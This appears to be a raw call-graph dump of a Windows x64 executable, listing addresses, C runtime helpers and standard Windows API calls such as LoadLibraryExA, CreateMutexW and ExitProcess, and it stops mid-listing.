7ff6de52921c _wcsupr_s 14 API calls 75898->75899 75903 7ff6de501b69 75898->75903 75900 7ff6de501b5b 75899->75900 75923 7ff6de529294 14 API calls 2 library calls 75900->75923 75904 7ff6de501b72 75903->75904 75924 7ff6de529ac8 6 API calls try_get_function 75903->75924 75904->75587 75906 7ff6de4fd410 75905->75906 75925 7ff6de5267cc 75906->75925 75908 7ff6de4fd41c 75931 7ff6de4fd6f4 75908->75931 75911 7ff6de4fd4b5 75911->75587 75912 7ff6de4fd434 _RTC_Initialize 75920 7ff6de4fd489 75912->75920 75936 7ff6de4fd8a4 75912->75936 75914 7ff6de4fd449 75939 7ff6de525f54 75914->75939 75918 7ff6de4fd45e 75919 7ff6de526e98 26 API calls 75918->75919 75919->75920 75921 7ff6de4fd4a5 75920->75921 75972 7ff6de4fd9d4 7 API calls 2 library calls 75920->75972 75921->75587 75922->75898 75923->75903 75924->75903 75926 7ff6de5267dd 75925->75926 75927 7ff6de51aef8 _get_daylight 14 API calls 75926->75927 75928 7ff6de5267e5 75926->75928 75929 7ff6de5267f4 75927->75929 75928->75908 75973 7ff6de528b14 23 API calls _invalid_parameter_noinfo 75929->75973 75932 7ff6de4fd705 75931->75932 75935 7ff6de4fd70a __scrt_release_startup_lock 75931->75935 75932->75935 75974 7ff6de4fd9d4 7 API calls 2 library calls 75932->75974 75934 7ff6de4fd77e 75935->75912 75975 7ff6de4fd868 75936->75975 75938 7ff6de4fd8ad 75938->75914 75940 7ff6de4fd455 75939->75940 75941 7ff6de525f74 75939->75941 75940->75920 75971 7ff6de4fd97c InitializeSListHead 75940->75971 75942 7ff6de525f7c 75941->75942 75943 7ff6de525f92 75941->75943 75944 7ff6de51aef8 _get_daylight 14 API calls 75942->75944 75945 7ff6de53695c 37 API calls 75943->75945 75946 7ff6de525f81 75944->75946 75947 7ff6de525f97 75945->75947 75980 7ff6de528b14 23 API calls _invalid_parameter_noinfo 75946->75980 75981 7ff6de536114 30 API calls 4 library calls 75947->75981 75950 7ff6de525fae 75982 7ff6de525d34 26 API calls 75950->75982 75952 7ff6de525feb 75983 7ff6de525ef4 14 API calls 2 library calls 75952->75983 75954 7ff6de526001 75955 7ff6de526009 75954->75955 75956 7ff6de526021 75954->75956 75957 7ff6de51aef8 _get_daylight 14 API calls 75955->75957 75985 7ff6de525d34 26 API calls 75956->75985 75959 7ff6de52600e 75957->75959 75984 7ff6de529294 14 API calls 2 library calls 75959->75984 75960 7ff6de526043 75989 7ff6de529294 14 API calls 2 library calls 75960->75989 75962 7ff6de52601c 75962->75940 75964 7ff6de52603d 75964->75960 75965 7ff6de526088 75964->75965 75966 7ff6de52606f 75964->75966 75988 7ff6de529294 14 API calls 2 library calls 75965->75988 75986 7ff6de529294 14 API calls 2 library calls 75966->75986 75968 7ff6de526078 75987 7ff6de529294 14 API calls 2 library calls 75968->75987 75972->75911 75973->75928 75974->75934 75976 7ff6de4fd882 75975->75976 75978 7ff6de4fd87b 75975->75978 75979 7ff6de5285ec 26 API calls 75976->75979 75978->75938 75979->75978 75980->75940 75981->75950 75982->75952 75983->75954 75984->75962 75985->75964 75986->75968 75987->75962 75988->75960 75989->75940 75991 7ff6de4fdb37 GetStartupInfoW 75990->75991 75991->75566 75992->75596 75994 7ff6de456b92 75993->75994 76006 7ff6de464a00 75994->76006 75997 7ff6de456bee 76027 7ff6de455250 60 API calls _wcsupr_s 75997->76027 75998 7ff6de456c01 76009 7ff6de45de20 75998->76009 76005 7ff6de455116 76005->75603 76028 7ff6de45a530 76006->76028 76008 7ff6de456be1 76008->75997 76008->75998 76010 7ff6de453037 _mbsncpy_s 94 API calls 76009->76010 76011 7ff6de456c2b 76010->76011 76012 7ff6de455300 76011->76012 76013 7ff6de45536b 76012->76013 76014 7ff6de455314 wcsxfrm 76012->76014 76020 7ff6de45a810 76013->76020 76014->76013 76333 7ff6de45c230 94 API calls 3 library calls 76014->76333 76016 7ff6de455339 76334 7ff6de455250 60 API calls _wcsupr_s 76016->76334 76018 7ff6de45535c 76335 7ff6de45b4e0 76018->76335 76340 7ff6de47e2c0 76020->76340 76022 7ff6de453037 _mbsncpy_s 94 API calls 76024 7ff6de45a842 76022->76024 76023 7ff6de45a937 76025 7ff6de45b260 6 API calls 76023->76025 76024->76022 76024->76023 76026 7ff6de45a965 76025->76026 76026->76005 76027->76005 76037 7ff6de476950 76028->76037 76030 7ff6de45a559 76032 7ff6de45a55d _handle_error 76030->76032 76033 7ff6de45a57c __scrt_get_show_window_mode 76030->76033 76041 7ff6de478930 76030->76041 76032->76008 76033->76032 76044 7ff6de453037 76033->76044 76035 7ff6de45a7cb 76035->76032 76052 7ff6de45b260 76035->76052 76038 7ff6de476963 LoadLibraryExA 76037->76038 76040 7ff6de476982 Concurrency::details::_UnrealizedChore::_CancelViaToken 76037->76040 76039 7ff6de476986 GetProcAddressForCaller 76038->76039 76038->76040 76039->76040 76040->76030 76042 7ff6de478bb0 3 API calls 76041->76042 76043 7ff6de47894c __scrt_get_show_window_mode 76042->76043 76043->76033 76060 7ff6de4764e4 76044->76060 76065 7ff6de464490 76044->76065 76079 7ff6de45b3d0 76044->76079 76045 7ff6de45348c 76084 7ff6de470f90 94 API calls 2 library calls 76045->76084 76046 7ff6de452ddf 76046->76035 76046->76044 76046->76045 76048 7ff6de452420 76053 7ff6de45b28a 76052->76053 76316 7ff6de473ed0 76053->76316 76055 7ff6de45b29e 76319 7ff6de4727e0 76055->76319 76057 7ff6de45b2a8 76059 7ff6de45b39c 76057->76059 76323 7ff6de478ad0 76057->76323 76059->76032 76085 7ff6de4ba950 76060->76085 76062 7ff6de476505 76111 7ff6de475590 76062->76111 76064 7ff6de47650f 76064->76046 76182 7ff6de477170 76065->76182 76067 7ff6de46456d 76068 7ff6de464585 76067->76068 76069 7ff6de464574 76067->76069 76211 7ff6de486200 94 API calls 4 library calls 76068->76211 76195 7ff6de484c00 76069->76195 76072 7ff6de4644cf _free_nolock 76072->76067 76209 7ff6de4605a0 94 API calls 2 library calls 76072->76209 76073 7ff6de46457e 76212 7ff6de46eae0 94 API calls 76073->76212 76075 7ff6de4645b6 76075->76046 76077 7ff6de46454c 76210 7ff6de460600 5 API calls _free_nolock 76077->76210 76282 7ff6de468450 76079->76282 76084->76048 76086 7ff6de4ba9b7 76085->76086 76086->76086 76121 7ff6de4ba900 76086->76121 76088 7ff6de4baa15 76125 7ff6de4737c0 76088->76125 76090 7ff6de4baa87 76128 7ff6de4aaa20 76090->76128 76096 7ff6de4bf750 5 API calls 76105 7ff6de4babb7 76096->76105 76097 7ff6de4bf660 94 API calls 76097->76105 76099 7ff6de4bb460 94 API calls 76099->76105 76104 7ff6de4baebf memcpy_s 76151 7ff6de4bf750 76104->76151 76105->76096 76105->76097 76105->76099 76105->76104 76107 7ff6de4737c0 94 API calls 76105->76107 76137 7ff6de4ce3a0 76105->76137 76141 7ff6de4be150 76105->76141 76147 7ff6de4c21b0 76105->76147 76155 7ff6de4ce040 94 API calls 76105->76155 76156 7ff6de4ccc10 RtlCaptureContext RtlLookupFunctionEntry RtlRestoreContext RtlVirtualUnwind RaiseException 76105->76156 76157 7ff6de4c04a0 94 API calls 76105->76157 76158 7ff6de4cd4f0 94 API calls 2 library calls 76105->76158 76107->76105 76110 7ff6de4baff8 _handle_error 76110->76062 76112 7ff6de475611 76111->76112 76113 7ff6de4aaa90 94 API calls 76112->76113 76115 7ff6de47583b 76113->76115 76114 7ff6de47597e 76114->76064 76115->76114 76180 7ff6de4cee70 94 API calls 2 library calls 76115->76180 76117 7ff6de47589d 76117->76114 76118 7ff6de46b7a0 type_info::_name_internal_method 94 API calls 76117->76118 76119 7ff6de4758e9 Concurrency::details::_UnrealizedChore::_CancelViaToken 76118->76119 76181 7ff6de4cf070 94 API calls _wcsupr_s 76119->76181 76122 7ff6de4ba930 76121->76122 76123 7ff6de4ba926 76121->76123 76122->76088 76160 7ff6de4d5d90 94 API calls _free_nolock 76123->76160 76126 7ff6de468d00 _free_nolock 94 API calls 76125->76126 76127 7ff6de47383b memcpy_s 76126->76127 76127->76090 76129 7ff6de4aaa49 76128->76129 76130 7ff6de4aaa3d 76128->76130 76132 7ff6de4aaee0 94 API calls 76129->76132 76161 7ff6de4ab0e0 76130->76161 76133 7ff6de4aaa47 76132->76133 76134 7ff6de4cc660 76133->76134 76171 7ff6de4c2a10 94 API calls Concurrency::details::_UnrealizedChore::_CancelViaToken 76134->76171 76136 7ff6de4cc685 76136->76105 76138 7ff6de4ce3e6 76137->76138 76140 7ff6de4ce5dd 76138->76140 76172 7ff6de4736b0 5 API calls 2 library calls 76138->76172 76140->76105 76143 7ff6de4be16f 76141->76143 76142 7ff6de4be273 76142->76105 76144 7ff6de4be1e6 76143->76144 76173 7ff6de4bb460 76143->76173 76144->76142 76146 7ff6de4bb460 94 API calls 76144->76146 76146->76144 76149 7ff6de4c21c8 type_info::_name_internal_method 76147->76149 76148 7ff6de4c2291 76148->76105 76149->76148 76178 7ff6de4be540 94 API calls Concurrency::details::_UnrealizedChore::_CancelViaToken 76149->76178 76152 7ff6de4bf775 76151->76152 76154 7ff6de4baf63 76151->76154 76152->76154 76179 7ff6de4736b0 5 API calls 2 library calls 76152->76179 76154->76110 76159 7ff6de4736b0 5 API calls 2 library calls 76154->76159 76155->76105 76156->76105 76157->76105 76158->76105 76159->76110 76160->76122 76164 7ff6de4aaf50 76161->76164 76169 7ff6de4aaf88 Concurrency::details::_UnrealizedChore::_CancelViaToken 76164->76169 76165 7ff6de4ab0c3 76166 7ff6de4736b0 Concurrency::details::_UnrealizedChore::_CancelViaToken 5 API calls 76165->76166 76167 7ff6de4ab03b 76166->76167 76167->76133 76168 7ff6de4aad30 6 API calls 76168->76169 76169->76165 76169->76167 76169->76168 76170 7ff6de4aada0 VirtualFree 76169->76170 76170->76169 76171->76136 76172->76140 76174 7ff6de4bb483 76173->76174 76175 7ff6de4bb48d 76173->76175 76177 7ff6de4bb410 94 API calls 76174->76177 76175->76143 76177->76175 76178->76149 76179->76154 76180->76117 76181->76114 76213 7ff6de4777f0 76182->76213 76184 7ff6de4777f0 _wcsupr_s 94 API calls 76191 7ff6de4772d0 76184->76191 76185 7ff6de47731f 76189 7ff6de4772f8 76185->76189 76218 7ff6de4605a0 94 API calls 2 library calls 76185->76218 76188 7ff6de4777f0 _wcsupr_s 94 API calls 76188->76191 76189->76072 76190 7ff6de47737f _wcsupr_s 76219 7ff6de460600 5 API calls _free_nolock 76190->76219 76191->76184 76191->76185 76191->76189 76192 7ff6de477315 76191->76192 76217 7ff6de4778c0 94 API calls _wcsupr_s 76192->76217 76196 7ff6de484c45 76195->76196 76231 7ff6de485c90 76196->76231 76201 7ff6de484c90 76202 7ff6de484dd5 76201->76202 76260 7ff6de484e10 94 API calls 2 library calls 76201->76260 76202->76073 76206 7ff6de484c62 76206->76201 76243 7ff6de4851c0 76206->76243 76247 7ff6de485170 76206->76247 76251 7ff6de484840 76206->76251 76258 7ff6de484e10 94 API calls 2 library calls 76206->76258 76259 7ff6de45ad60 94 API calls _free_nolock 76206->76259 76209->76077 76210->76067 76211->76073 76212->76075 76214 7ff6de477250 76213->76214 76215 7ff6de477834 76213->76215 76214->76188 76214->76191 76220 7ff6de477700 76215->76220 76217->76185 76218->76190 76219->76189 76225 7ff6de464600 76220->76225 76222 7ff6de47773d 76222->76214 76226 7ff6de51b000 23 API calls 76225->76226 76227 7ff6de46462a 76226->76227 76228 7ff6de51b380 _fread_nolock 39 API calls 76227->76228 76229 7ff6de46462e 76227->76229 76228->76229 76229->76222 76230 7ff6de460690 94 API calls 2 library calls 76229->76230 76230->76222 76232 7ff6de4851c0 94 API calls 76231->76232 76237 7ff6de485ca8 76232->76237 76233 7ff6de484c4f 76233->76206 76257 7ff6de484e10 94 API calls 2 library calls 76233->76257 76234 7ff6de485d8b 76235 7ff6de485d96 _free_nolock 76234->76235 76236 7ff6de485dcf 76234->76236 76239 7ff6de46b7a0 type_info::_name_internal_method 94 API calls 76235->76239 76240 7ff6de485170 94 API calls 76236->76240 76237->76233 76237->76234 76261 7ff6de49e570 94 API calls 4 library calls 76237->76261 76239->76233 76241 7ff6de485deb 76240->76241 76242 7ff6de46b7a0 type_info::_name_internal_method 94 API calls 76241->76242 76242->76233 76244 7ff6de4851f9 76243->76244 76245 7ff6de4851e8 76243->76245 76244->76206 76262 7ff6de484ed0 76245->76262 76248 7ff6de4851ac 76247->76248 76249 7ff6de485198 76247->76249 76248->76206 76250 7ff6de484ed0 94 API calls 76249->76250 76250->76248 76253 7ff6de48486e 76251->76253 76275 7ff6de468da0 76253->76275 76254 7ff6de4849ac 76280 7ff6de485790 94 API calls type_info::_name_internal_method 76254->76280 76256 7ff6de484ad7 76256->76206 76257->76206 76258->76206 76259->76206 76260->76202 76261->76237 76263 7ff6de484eec 76262->76263 76267 7ff6de484f06 memcpy_s 76263->76267 76272 7ff6de484e10 94 API calls 2 library calls 76263->76272 76265 7ff6de484790 94 API calls 76265->76267 76266 7ff6de485023 76268 7ff6de485039 76266->76268 76273 7ff6de484e10 94 API calls 2 library calls 76266->76273 76267->76265 76267->76266 76267->76268 76271 7ff6de464600 39 API calls 76267->76271 76274 7ff6de460690 94 API calls 2 library calls 76267->76274 76268->76244 76271->76267 76272->76267 76273->76268 76274->76267 76279 7ff6de478b40 10 API calls 76275->76279 76276 7ff6de468dd6 76277 7ff6de468ded 76276->76277 76281 7ff6de460690 94 API calls 2 library calls 76276->76281 76277->76254 76279->76276 76280->76256 76281->76277 76283 7ff6de45b3ed 76282->76283 76284 7ff6de468484 76282->76284 76286 7ff6de468420 76283->76286 76284->76283 76290 7ff6de46a690 76284->76290 76289 7ff6de468429 76286->76289 76287 7ff6de45b3f7 76287->76046 76289->76287 76306 7ff6de46a850 76289->76306 76291 7ff6de46a707 76290->76291 76296 7ff6de452f8a 76291->76296 76293 7ff6de46a7dd 76294 7ff6de46a844 76293->76294 76304 7ff6de460600 5 API calls _free_nolock 76293->76304 76294->76284 76300 7ff6de452ddf 76296->76300 76297 7ff6de45348c 76305 7ff6de470f90 94 API calls 2 library calls 76297->76305 76299 7ff6de452420 76300->76293 76300->76297 76301 7ff6de4764e4 94 API calls 76300->76301 76302 7ff6de45b3d0 94 API calls 76300->76302 76303 7ff6de464490 94 API calls 76300->76303 76301->76300 76302->76300 76303->76300 76304->76294 76305->76299 76307 7ff6de46a888 76306->76307 76308 7ff6de46a8bd 76307->76308 76309 7ff6de46a9a3 wcsxfrm 76307->76309 76315 7ff6de46d720 94 API calls 2 library calls 76308->76315 76311 7ff6de46a99e 76309->76311 76312 7ff6de46a690 94 API calls 76309->76312 76311->76289 76312->76311 76313 7ff6de46a94c 76313->76311 76314 7ff6de46a690 94 API calls 76313->76314 76314->76311 76315->76313 76327 7ff6de4aa990 76316->76327 76318 7ff6de473ef3 76318->76055 76320 7ff6de472802 76319->76320 76322 7ff6de47280c 76319->76322 76332 7ff6de4a7300 VirtualFree 76320->76332 76322->76057 76326 7ff6de478af3 76323->76326 76324 7ff6de478b35 76324->76059 76325 7ff6de478c90 4 API calls 76325->76326 76326->76324 76326->76325 76328 7ff6de4aa9ca 76327->76328 76329 7ff6de4aaa0d 76328->76329 76331 7ff6de4aada0 VirtualFree 76328->76331 76329->76318 76331->76328 76332->76322 76333->76016 76334->76018 76336 7ff6de45b4f8 76335->76336 76337 7ff6de45b563 76335->76337 76336->76337 76339 7ff6de45aca0 94 API calls 2 library calls 76336->76339 76337->76013 76339->76337 76341 7ff6de47e2f6 76340->76341 76345 7ff6de47e33e 76340->76345 76346 7ff6de47e6e0 WaitForSingleObject DeleteCriticalSection 76341->76346 76343 7ff6de47e300 76347 7ff6de473bb0 94 API calls 3 library calls 76343->76347 76345->76024 76346->76343 76347->76345 76348 7ff6de4521fc 76349 7ff6de45221f 76348->76349 76352 7ff6de46f8b0 76349->76352 76351 7ff6de453283 76353 7ff6de46f8d7 76352->76353 76355 7ff6de46fb04 wcsxfrm 76353->76355 76356 7ff6de46fb0b wcsxfrm 76353->76356 76359 7ff6de46f8fa wcsxfrm 76353->76359 76358 7ff6de46f941 wcsxfrm 76355->76358 76375 7ff6de460950 94 API calls strrchr 76355->76375 76356->76355 76374 7ff6de460a70 94 API calls 2 library calls 76356->76374 76358->76351 76359->76355 76359->76358 76360 7ff6de46fa6d 76359->76360 76363 7ff6de46fa81 76359->76363 76372 7ff6de460950 94 API calls strrchr 76360->76372 76362 7ff6de46fa7f 76366 7ff6de46d290 76362->76366 76363->76362 76373 7ff6de460950 94 API calls strrchr 76363->76373 76367 7ff6de46d2b2 __ExceptionPtrDestroy 76366->76367 76371 7ff6de46d321 __ExceptionPtrDestroy 76367->76371 76376 7ff6de46e560 76367->76376 76369 7ff6de46d30d 76380 7ff6de46d720 94 API calls 2 library calls 76369->76380 76371->76355 76372->76362 76373->76362 76374->76355 76375->76358 76377 7ff6de46e592 __ExceptionPtrDestroy 76376->76377 76381 7ff6de46caf0 76377->76381 76379 7ff6de46e691 _handle_error 76379->76369 76380->76371 76382 7ff6de46cb4b 76381->76382 76394 7ff6de46cbba __ExceptionPtrDestroy 76381->76394 76383 7ff6de46cb6a 76382->76383 76398 7ff6de460950 94 API calls strrchr 76382->76398 76386 7ff6de46cc29 76383->76386 76387 7ff6de46cb89 76383->76387 76388 7ff6de468d00 _free_nolock 94 API calls 76386->76388 76389 7ff6de468d00 _free_nolock 94 API calls 76387->76389 76388->76394 76389->76394 76390 7ff6de46cec5 __ExceptionPtrDestroy 76390->76379 76391 7ff6de46cde6 76393 7ff6de468d00 _free_nolock 94 API calls 76391->76393 76397 7ff6de46ce28 __ExceptionPtrDestroy 76391->76397 76393->76397 76396 7ff6de46ccde wcsxfrm __ExceptionPtrDestroy 76394->76396 76399 7ff6de46de50 94 API calls 2 library calls 76394->76399 76396->76391 76396->76397 76400 7ff6de46d5c0 94 API calls __ExceptionPtrDestroy 76396->76400 76397->76390 76401 7ff6de46d720 94 API calls 2 library calls 76397->76401 76398->76383 76399->76396 76400->76396 76401->76397 76402 7ff6de497930 76407 7ff6de45fb80 94 API calls 4 library calls 76402->76407 76404 7ff6de49794e 76408 7ff6de5255c4 76404->76408 76406 7ff6de49795d 76407->76404 76436 7ff6de501ab8 76408->76436 76411 7ff6de525608 76413 7ff6de52562b 76411->76413 76414 7ff6de52560d 76411->76414 76412 7ff6de5256ea 76442 7ff6de528b34 9 API calls __CxxCallCatchBlock 76412->76442 76419 7ff6de51aef8 _get_daylight 14 API calls 76413->76419 76421 7ff6de525621 76413->76421 76414->76421 76439 7ff6de530d88 31 API calls 4 library calls 76414->76439 76422 7ff6de525650 76419->76422 76420 7ff6de525699 _handle_error 76420->76406 76441 7ff6de529294 14 API calls 2 library calls 76421->76441 76423 7ff6de51aef8 _get_daylight 14 API calls 76422->76423 76424 7ff6de525657 76423->76424 76425 7ff6de52567c 76424->76425 76426 7ff6de525673 76424->76426 76428 7ff6de51aef8 _get_daylight 14 API calls 76425->76428 76427 7ff6de51aef8 _get_daylight 14 API calls 76426->76427 76427->76421 76429 7ff6de525681 76428->76429 76430 7ff6de52569e 76429->76430 76431 7ff6de51aef8 _get_daylight 14 API calls 76429->76431 76432 7ff6de51aef8 _get_daylight 14 API calls 76430->76432 76433 7ff6de52568b 76431->76433 76432->76421 76433->76430 76434 7ff6de525690 76433->76434 76440 7ff6de529294 14 API calls 2 library calls 76434->76440 76443 7ff6de501748 76436->76443 76438 7ff6de501ad2 76438->76411 76438->76412 76439->76421 76440->76420 76441->76420 76475 7ff6de5291ac EnterCriticalSection 76443->76475 76445 7ff6de501774 76446 7ff6de50177c 76445->76446 76449 7ff6de50179f 76445->76449 76447 7ff6de51aef8 _get_daylight 14 API calls 76446->76447 76448 7ff6de501781 76447->76448 76450 7ff6de528b14 _invalid_parameter_noinfo 23 API calls 76448->76450 76451 7ff6de50189c 41 API calls 76449->76451 76452 7ff6de50178d 76450->76452 76455 7ff6de5017a7 __CxxCallCatchBlock 76451->76455 76453 7ff6de529200 _isindst LeaveCriticalSection 76452->76453 76454 7ff6de501807 76453->76454 76454->76438 76455->76452 76456 7ff6de5017e3 76455->76456 76457 7ff6de5017d3 76455->76457 76458 7ff6de528840 __std_exception_copy 23 API calls 76456->76458 76459 7ff6de51aef8 _get_daylight 14 API calls 76457->76459 76460 7ff6de5017f1 76458->76460 76459->76452 76460->76452 76461 7ff6de501824 76460->76461 76462 7ff6de528b34 _invalid_parameter_noinfo 9 API calls 76461->76462 76463 7ff6de501838 _vswprintf 76462->76463 76464 7ff6de50184a 76463->76464 76467 7ff6de501874 76463->76467 76465 7ff6de51aef8 _get_daylight 14 API calls 76464->76465 76466 7ff6de50184f 76465->76466 76468 7ff6de528b14 _invalid_parameter_noinfo 23 API calls 76466->76468 76470 7ff6de5291ac _isindst EnterCriticalSection 76467->76470 76469 7ff6de50185a 76468->76469 76469->76438 76471 7ff6de50187e 76470->76471 76472 7ff6de50189c 41 API calls 76471->76472 76473 7ff6de501887 76472->76473 76474 7ff6de529200 _isindst LeaveCriticalSection 76473->76474 76474->76469 76476 7ff6de454a97 76477 7ff6de454aa7 76476->76477 76480 7ff6de4630a0 76477->76480 76479 7ff6de454ac4 76481 7ff6de51aef8 _get_daylight 14 API calls 76480->76481 76482 7ff6de4630b3 GetLastError 76481->76482 76494 7ff6de463ca0 76482->76494 76485 7ff6de463156 76488 7ff6de46318d 76485->76488 76500 7ff6de473fc0 76485->76500 76486 7ff6de463132 76504 7ff6de4740a0 96 API calls _get_daylight 76486->76504 76492 7ff6de46314f 76488->76492 76505 7ff6de463a80 98 API calls _handle_error 76488->76505 76491 7ff6de51aef8 _get_daylight 14 API calls 76493 7ff6de463294 SetLastError 76491->76493 76492->76491 76493->76479 76495 7ff6de463d67 76494->76495 76496 7ff6de463cbf 76494->76496 76507 7ff6de462320 94 API calls _free_nolock 76495->76507 76506 7ff6de462320 94 API calls _free_nolock 76496->76506 76499 7ff6de46310f 76499->76485 76499->76486 76502 7ff6de474020 76500->76502 76501 7ff6de453037 _mbsncpy_s 94 API calls 76501->76502 76502->76501 76503 7ff6de474089 76502->76503 76503->76488 76504->76492 76505->76492 76506->76499 76507->76499 76508 7ff6de51ac60 76509 7ff6de51acc7 76508->76509 76510 7ff6de51ac7d GetModuleHandleW 76508->76510 76518 7ff6de51ab58 76509->76518 76510->76509 76516 7ff6de51ac8a 76510->76516 76513 7ff6de51ad09 76515 7ff6de51ad1b 76516->76509 76532 7ff6de51ad68 GetModuleHandleExW 76516->76532 76538 7ff6de5291ac EnterCriticalSection 76518->76538 76520 7ff6de51ab74 76521 7ff6de51ab90 14 API calls 76520->76521 76522 7ff6de51ab7d 76521->76522 76523 7ff6de529200 _isindst LeaveCriticalSection 76522->76523 76524 7ff6de51ab85 76523->76524 76524->76513 76525 7ff6de51ad1c 76524->76525 76539 7ff6de52d484 76525->76539 76528 7ff6de51ad56 76530 7ff6de51ad68 3 API calls 76528->76530 76529 7ff6de51ad45 GetCurrentProcess TerminateProcess 76529->76528 76531 7ff6de51ad5d ExitProcess 76530->76531 76533 7ff6de51adad 76532->76533 76534 7ff6de51ad8e GetProcAddress 76532->76534 76536 7ff6de51adb7 FreeLibrary 76533->76536 76537 7ff6de51adbd 76533->76537 76534->76533 76535 7ff6de51ada5 76534->76535 76535->76533 76536->76537 76537->76509 76540 7ff6de52d4a2 76539->76540 76541 7ff6de51ad29 76539->76541 76543 7ff6de529550 76540->76543 76541->76528 76541->76529 76544 7ff6de529378 try_get_function 5 API calls 76543->76544 76545 7ff6de529578 76544->76545 76545->76541 76546 7ff6de452c6e 76547 7ff6de452ca4 76546->76547 76548 7ff6de452e9e 76546->76548 76575 7ff6de4a0300 76547->76575 76579 7ff6de49f900 76547->76579 76591 7ff6de456950 76547->76591 76630 7ff6de4a1750 76547->76630 76636 7ff6de45aca0 94 API calls 2 library calls 76548->76636 76550 7ff6de452ed0 76551 7ff6de452cb0 76555 7ff6de452dd7 76551->76555 76558 7ff6de452d98 76551->76558 76562 7ff6de45273d 76551->76562 76565 7ff6de453098 76551->76565 76552 7ff6de45348c 76637 7ff6de470f90 94 API calls 2 library calls 76552->76637 76554 7ff6de454978 76642 7ff6de4a70e0 96 API calls 76554->76642 76555->76552 76572 7ff6de4764e4 94 API calls 76555->76572 76573 7ff6de45b3d0 94 API calls 76555->76573 76574 7ff6de464490 94 API calls 76555->76574 76557 7ff6de455066 76558->76555 76635 7ff6de45aca0 94 API calls 2 library calls 76558->76635 76561 7ff6de452420 76562->76562 76562->76565 76638 7ff6de452420 96 API calls 2 library calls 76562->76638 76639 7ff6de491b70 94 API calls 2 library calls 76562->76639 76640 7ff6de45aca0 94 API calls 2 library calls 76562->76640 76563 7ff6de454941 76565->76554 76565->76563 76641 7ff6de45aca0 94 API calls 2 library calls 76565->76641 76572->76555 76573->76555 76574->76555 76576 7ff6de4a0377 76575->76576 76577 7ff6de4a0327 76575->76577 76576->76551 76577->76576 76643 7ff6de4dee10 76577->76643 76580 7ff6de49f913 __ExceptionPtrDestroy 76579->76580 76652 7ff6de49edf0 76580->76652 76584 7ff6de49f94f __ExceptionPtrDestroy 76585 7ff6de49f97f 76584->76585 76586 7ff6de49fa1b 76584->76586 76666 7ff6de472250 94 API calls 2 library calls 76584->76666 76585->76551 76668 7ff6de49f5c0 96 API calls 4 library calls 76586->76668 76589 7ff6de49fa05 76589->76586 76667 7ff6de460fa0 94 API calls 2 library calls 76589->76667 76592 7ff6de45698b 76591->76592 76593 7ff6de4569bd 76592->76593 76594 7ff6de4569a5 76592->76594 76596 7ff6de4569ed 76593->76596 76759 7ff6de45cb50 94 API calls _free_nolock 76593->76759 76758 7ff6de4551e0 59 API calls _wcsupr_s 76594->76758 76704 7ff6de468020 76596->76704 76597 7ff6de4569aa 76597->76551 76599 7ff6de4569d7 76760 7ff6de45d5e0 76599->76760 76602 7ff6de456a06 76717 7ff6de455690 76602->76717 76605 7ff6de456a4d 76605->76597 76607 7ff6de456a77 76605->76607 76769 7ff6de455500 57 API calls _wcsupr_s 76605->76769 76725 7ff6de4566b0 76607->76725 76611 7ff6de456ace 76611->76597 76613 7ff6de456af0 76611->76613 76616 7ff6de456b06 _wcsupr_s 76611->76616 76770 7ff6de455530 94 API calls 2 library calls 76613->76770 76615 7ff6de456afa 76771 7ff6de455c10 98 API calls 2 library calls 76615->76771 76616->76597 76772 7ff6de51a1fc 76616->76772 76622 7ff6de456b39 76786 7ff6de455500 57 API calls _wcsupr_s 76622->76786 76623 7ff6de456b54 76789 7ff6de455740 117 API calls _wcsupr_s 76623->76789 76626 7ff6de456b3e 76787 7ff6de455530 94 API calls 2 library calls 76626->76787 76628 7ff6de456b48 76788 7ff6de455c10 98 API calls 2 library calls 76628->76788 77133 7ff6de4a5910 76630->77133 76635->76558 76636->76550 76637->76561 76638->76562 76639->76562 76640->76562 76641->76565 76642->76557 76646 7ff6de4df080 76643->76646 76647 7ff6de4df0ed 76646->76647 76651 7ff6de4df094 76646->76651 76648 7ff6de4dee23 76647->76648 76649 7ff6de4df0f8 FreeLibrary 76647->76649 76648->76576 76649->76648 76650 7ff6de4df0cb FreeLibrary 76650->76651 76651->76648 76651->76650 76653 7ff6de49ee25 76652->76653 76654 7ff6de49ee4a 76653->76654 76669 7ff6de461310 94 API calls __ExceptionPtrDestroy 76653->76669 76654->76584 76656 7ff6de4ddc40 76654->76656 76657 7ff6de4ddc70 76656->76657 76665 7ff6de4dddcc _handle_error _mbsncpy_s 76657->76665 76670 7ff6de4dde50 76657->76670 76659 7ff6de4ddd15 76691 7ff6de455074 76659->76691 76661 7ff6de4ddd4a 76662 7ff6de4ddd81 76661->76662 76694 7ff6de46d720 94 API calls 2 library calls 76661->76694 76695 7ff6de4de6e0 94 API calls memcpy_s 76662->76695 76665->76584 76666->76589 76667->76586 76668->76585 76669->76654 76671 7ff6de4ddebb __scrt_get_show_window_mode 76670->76671 76673 7ff6de4ddf15 76671->76673 76696 7ff6de4dda60 94 API calls task 76671->76696 76675 7ff6de4de18f 76673->76675 76676 7ff6de4de64c 76673->76676 76687 7ff6de4ddf1c 76673->76687 76678 7ff6de4de212 76675->76678 76684 7ff6de4de1af 76675->76684 76697 7ff6de461010 94 API calls std::rsfun 76675->76697 76680 7ff6de4de665 76676->76680 76703 7ff6de461010 94 API calls std::rsfun 76676->76703 76698 7ff6de4ddac0 94 API calls 76678->76698 76680->76659 76683 7ff6de4de513 76683->76659 76685 7ff6de4de30d 76684->76685 76684->76687 76689 7ff6de4de2c8 76684->76689 76685->76687 76700 7ff6de4dda60 94 API calls task 76685->76700 76688 7ff6de4de391 76687->76688 76701 7ff6de461010 94 API calls std::rsfun 76687->76701 76702 7ff6de4d0960 96 API calls memcpy_s 76688->76702 76689->76687 76699 7ff6de4dda60 94 API calls task 76689->76699 76692 7ff6de45508b CreateMutexW 76691->76692 76692->76661 76694->76662 76695->76665 76696->76673 76697->76678 76698->76684 76699->76687 76700->76687 76701->76688 76702->76683 76703->76680 76708 7ff6de468037 76704->76708 76705 7ff6de46808d 76790 7ff6de464b70 76705->76790 76708->76705 76801 7ff6de45ca10 76708->76801 76807 7ff6de45c860 94 API calls 3 library calls 76708->76807 76808 7ff6de45dce0 94 API calls strrchr 76708->76808 76710 7ff6de468100 76712 7ff6de45b4e0 wcsxfrm 94 API calls 76710->76712 76711 7ff6de45ca10 task 94 API calls 76714 7ff6de4680a9 76711->76714 76715 7ff6de46810f 76712->76715 76714->76710 76714->76711 76716 7ff6de45d5e0 wcsxfrm 94 API calls 76714->76716 76715->76602 76716->76714 76718 7ff6de45d0c0 wcsxfrm 94 API calls 76717->76718 76724 7ff6de4556c5 76718->76724 76719 7ff6de45571b 76720 